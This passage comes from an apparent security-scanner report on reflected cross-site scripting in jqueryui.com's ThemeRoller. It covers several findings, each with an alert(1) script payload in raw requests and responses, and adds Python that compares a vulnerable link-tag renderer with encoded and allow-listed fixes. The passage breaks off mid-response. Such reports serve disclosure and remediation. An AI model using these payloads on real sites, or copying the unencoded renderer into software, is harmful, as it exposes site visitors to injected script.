The value of the bgColorOverlay request parameter is copied unencoded into a double-quoted HTML attribute value. The payload d8aec"><script>alert(1)</script>bd9d43878e2 submitted in the bgColorOverlay parameter was echoed unmodified in the application's response: the leading "> closes the attribute and its tag, so the <script> element that follows is parsed as markup rather than as part of the attribute value.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response and will run in the page's origin for any user who loads the crafted URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaad8aec"><script>alert(1)</script>bd9d43878e2&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaad8aec"><script>alert(1)</script>bd9d43878e2&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

3.53. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied unencoded into a double-quoted HTML attribute value. The payload 97187"><script>alert(1)</script>2b2f49b085a submitted in the bgColorShadow parameter was echoed unmodified in the application's response: the leading "> closes the attribute and its tag, so the <script> element that follows is parsed as markup rather than as part of the attribute value. The response snippet below shows the remainder of the element after the injection point, " type="text/css" media="all" />, confirming that the sink is the href of the stylesheet <link> element.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response and will run in the page's origin for any user who loads the crafted URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa97187"><script>alert(1)</script>2b2f49b085a&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa97187"><script>alert(1)</script>2b2f49b085a&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...
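
A worked example of the mechanism these ThemeRoller findings share, added here as editor's code and not taken from jqueryui.com, jQuery UI or the scanner. It puts the assumed vulnerable rendering of the stylesheet <link> href next to a hardened version (percent-encode the value, then HTML-attribute-encode the URL), adds allow-list validation for the colour and opacity parameter families seen in the report, and reproduces the canary check a scanner uses before calling a reflection "echoed unmodified". The PHP behind parseTheme.css.php is not shown in this report, so render_vulnerable is a stand-in that reproduces the observed output, not the site's source; HREF_BASE, SAMPLE_PARAMS and the function names are this example's own, and REPORT_CANARY is the payload from finding 3.53. One caveat to carry: the request lines in this report send ", < and > literally, as the scanner did; a link a victim would actually follow percent-encodes those characters, and whether the application reflects the decoded form the same way is not shown here.

```python
"""Reflected XSS through an unencoded double-quoted attribute, as in the
ThemeRoller findings: the assumed vulnerable renderer next to a hardened
one, allow-list validation for the colour and opacity parameter families,
and the canary check behind a scanner's "echoed unmodified" verdict.

Added example; not code from jqueryui.com or jQuery UI. The href path and
parameter names are taken from the report. The PHP that produced the
observed output is not shown there, so render_vulnerable() is an
assumption that reproduces the observed behaviour, not the site's source.
"""
import html
import re
import secrets
from urllib.parse import quote, urlencode

# Constructed sample: a shortened form of the report's query string.
SAMPLE_PARAMS = {
    "ffDefault": "Verdana,Arial,sans-serif",
    "bgColorHeader": "cccccc",
    "bgImgOpacityActive": "65",
    "bgColorShadow": "aaaaaa",
}
HREF_BASE = "/themeroller/css/parseTheme.css.php?ctl=themeroller&"
# Payload from finding 3.53, reused as the canary below.
REPORT_CANARY = '97187"><script>alert(1)</script>2b2f49b085a'


def render_vulnerable(params):
    """Assumed behaviour behind the finding: raw values concatenated into a
    double-quoted href. A value containing "> ends the attribute and the
    <link> element, and whatever follows is parsed as markup."""
    qs = "&".join(f"{k}={v}" for k, v in params.items())
    return (f'<link rel="stylesheet" href="{HREF_BASE}{qs}"'
            f' type="text/css" media="all" />')


def render_hardened(params):
    """Two independent layers, in this order:
    1. percent-encode each value (safe="" so even '/' is encoded), so the
       query string is a well-formed URL component and a value cannot add
       its own &name=value pairs;
    2. HTML-attribute-encode the whole URL, so ", <, > and & cannot act as
       attribute or tag delimiters in the page."""
    qs = urlencode(params, quote_via=quote, safe="")
    url = html.escape(HREF_BASE + qs, quote=True)
    return (f'<link rel="stylesheet" href="{url}"'
            f' type="text/css" media="all" />')


_HEX_COLOUR = re.compile(r"^[0-9a-fA-F]{3}(?:[0-9a-fA-F]{3})?$")
_PERCENT = re.compile(r"^[0-9]{1,3}$")
_COLOUR_PREFIXES = ("bgColor", "borderColor", "fc", "iconColor")
_OPACITY_PREFIXES = ("bgImgOpacity", "opacity")


def is_valid_theme_param(name, value):
    """Allow-list validation for the parameter families named in the report:
    colours are 3- or 6-digit hex, opacities integers 0-100. Anything else,
    including a name this function does not know, is rejected rather than
    "cleaned". Validation narrows the input; the encoding in render_hardened
    is still needed for parameters (fonts, texture file names) whose legal
    character set is wider."""
    if name.startswith(_COLOUR_PREFIXES):
        return _HEX_COLOUR.match(value) is not None
    if name.startswith(_OPACITY_PREFIXES):
        return _PERCENT.match(value) is not None and int(value) <= 100
    return False


def make_canary():
    """Random prefix and suffix around the breakout sequence, the shape of
    the report's payloads, so a hit cannot be a coincidental match against
    content already on the page."""
    return (f'{secrets.token_hex(3)[:5]}"><script>alert(1)</script>'
            f'{secrets.token_hex(6)[:11]}')


def reflects_unencoded(body, canary):
    """The check behind 'echoed unmodified': the canary, delimiters included,
    occurs byte-for-byte in the response. An encoded reflection (&quot;&gt;
    or %22%3E) does not match and is not a breakout."""
    return canary in body


def probe(render, base_params, param, canary):
    """Append the canary to one parameter's normal value, as the scanner did,
    and report whether the rendered response reflects it raw."""
    params = dict(base_params)
    params[param] = params[param] + canary
    return reflects_unencoded(render(params), canary)


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("hardened", render_hardened)):
        hit = probe(render, SAMPLE_PARAMS, "bgColorShadow", REPORT_CANARY)
        print(f"{label}: raw reflection = {hit}")
```

Both layers in render_hardened matter for different reasons: html.escape alone would neutralise this payload in the page, but without percent-encoding a value can still inject extra &name=value pairs into the query string that parseTheme.css.php receives when the browser fetches the stylesheet. The canary's random prefix and suffix are what let a report mark confidence as Certain: the exact string cannot appear in the response by accident.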

3.54. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied unencoded into a double-quoted HTML attribute value. The payload 49013"><script>alert(1)</script>e719f071a57 submitted in the bgImgOpacityActive parameter was echoed unmodified in the application's response: the leading "> closes the attribute and its tag, so the <script> element that follows is parsed as markup rather than as part of the attribute value.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response and will run in the page's origin for any user who loads the crafted URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6549013"><script>alert(1)</script>e719f071a57&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6549013"><script>alert(1)</script>e719f071a57&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

3.55. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied unencoded into a double-quoted HTML attribute value. The payload f2b8e"><script>alert(1)</script>4893dfa1069 submitted in the bgImgOpacityContent parameter was echoed unmodified in the application's response: the leading "> closes the attribute and its tag, so the <script> element that follows is parsed as markup rather than as part of the attribute value.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response and will run in the page's origin for any user who loads the crafted URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75f2b8e"><script>alert(1)</script>4893dfa1069&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75f2b8e"><script>alert(1)</script>4893dfa1069&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

3.56. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied unencoded into a double-quoted HTML attribute value. The payload 3f27d"><script>alert(1)</script>ef2045cfdcc submitted in the bgImgOpacityDefault parameter was echoed unmodified in the application's response: the leading "> closes the attribute and its tag, so the <script> element that follows is parsed as markup rather than as part of the attribute value.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response and will run in the page's origin for any user who loads the crafted URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753f27d"><script>alert(1)</script>ef2045cfdcc&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753f27d"><script>alert(1)</script>ef2045cfdcc&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

3.57. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied unencoded into a double-quoted HTML attribute value. The payload 10d83"><script>alert(1)</script>440d9262b96 submitted in the bgImgOpacityError parameter was echoed unmodified in the application's response: the leading "> closes the attribute and its tag, so the <script> element that follows is parsed as markup rather than as part of the attribute value.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response and will run in the page's origin for any user who loads the crafted URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9510d83"><script>alert(1)</script>440d9262b96&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9510d83"><script>alert(1)</script>440d9262b96&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...
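The /themeroller/ findings in this section share one sink: the query string is rebuilt into a double-quoted attribute with no encoding. The Python below is an added illustration, not code from jqueryui.com or the ThemeRoller project. It models that sink as a vulnerable function beside an encoding-only fix and a validate-then-encode fix. The endpoint path is the one visible in the report's responses; the allow-list rules are assumptions derived from the parameter values in the requests (75, 02_glass.png, cd0a0a, -8px, and so on), not from the application's source.

```python
import html
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, urlencode

# Path of the stylesheet URL seen in the report's responses.
CSS_ENDPOINT = "/themeroller/css/parseTheme.css.php"


def link_tag_vulnerable(query_string: str) -> str:
    """Models the sink as the report shows it: the raw query string is dropped
    into a double-quoted href with no HTML encoding, so a '">' in any parameter
    closes the attribute and the tag."""
    return ('<link rel="stylesheet" href="%s?ctl=themeroller&%s" '
            'type="text/css" media="all" />' % (CSS_ENDPOINT, query_string))


# Allow-list rules per parameter family. Assumed from the values in the report,
# not from the application's source. Each entry is (name pattern, value pattern).
RULES = [
    (re.compile(r"^(bgImgOpacity|opacity)\w+$"), re.compile(r"^(100|[1-9]?\d)$")),   # 0-100
    (re.compile(r"^bgTexture\w+$"), re.compile(r"^\d{2}_[a-z_]+\.png$")),            # 02_glass.png
    (re.compile(r"^(bgColor|borderColor|fc|iconColor)\w+$"), re.compile(r"^[0-9a-fA-F]{6}$")),
    (re.compile(r"^(cornerRadius|thickness|offsetTop|offsetLeft)\w*$"), re.compile(r"^-?\d+px$")),
    (re.compile(r"^ffDefault$"), re.compile(r"^[\w ,-]+$")),
    (re.compile(r"^fwDefault$"), re.compile(r"^(normal|bold)$")),
    (re.compile(r"^fsDefault$"), re.compile(r"^\d+(\.\d+)?(em|px|%)$")),
]


def validate(params: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Keeps only parameters whose name and value match an allow-list rule.
    Anything else (including the report's payloads) is dropped, not echoed."""
    return [(name, value) for name, value in params
            if any(n.match(name) and v.match(value) for n, v in RULES)]


def link_tag_encoded_only(query_string: str) -> str:
    """Output encoding alone: html.escape turns ", <, > and & into entities, which
    is enough to keep the value inside the attribute even if validation is bypassed."""
    href = "%s?ctl=themeroller&%s" % (CSS_ENDPOINT, query_string)
    return ('<link rel="stylesheet" href="%s" type="text/css" media="all" />'
            % html.escape(href, quote=True))


def link_tag_hardened(query_string: str) -> str:
    """Both layers: validate each parameter, rebuild the query with URL encoding,
    then HTML-encode the whole attribute value."""
    params = validate(parse_qsl(query_string, keep_blank_values=True))
    href = "%s?%s" % (CSS_ENDPOINT, urlencode([("ctl", "themeroller")] + params))
    return ('<link rel="stylesheet" href="%s" type="text/css" media="all" />'
            % html.escape(href, quote=True))


# Constructed input reusing the payload from finding 3.57 (not captured traffic).
PAYLOAD = '10d83"><script>alert(1)</script>440d9262b96'
SAMPLE_QUERY = ("bgColorError=fef1ec&bgTextureError=02_glass.png"
                "&bgImgOpacityError=95" + PAYLOAD + "&borderColorError=cd0a0a")

if __name__ == "__main__":
    print(link_tag_vulnerable(SAMPLE_QUERY))     # "><script> survives: the bug
    print(link_tag_encoded_only(SAMPLE_QUERY))   # &quot;&gt;&lt;script&gt;: contained
    print(link_tag_hardened(SAMPLE_QUERY))       # payload parameter dropped entirely
```

The encoding layer is the one that actually closes the hole; the allow-list is defence in depth and also keeps the generated stylesheet URL from carrying junk. Note that html.escape is applied to the complete attribute value after URL encoding, never before, so the two encodings do not interfere.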

3.58. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied, without HTML encoding, into a double-quoted HTML attribute value. The payload e5bb4"><script>alert(1)</script>9e07f5d558 was submitted in the bgImgOpacityHeader parameter and was echoed unmodified; the Response excerpt shows it inside the query string of the /themeroller/css/parseTheme.css.php?ctl=themeroller URL that the page rebuilds from its own parameters. The "> prefix closes the attribute value and its tag, so the <script> element that follows is parsed as markup.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response via a crafted /themeroller/ URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75e5bb4"><script>alert(1)</script>9e07f5d558&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
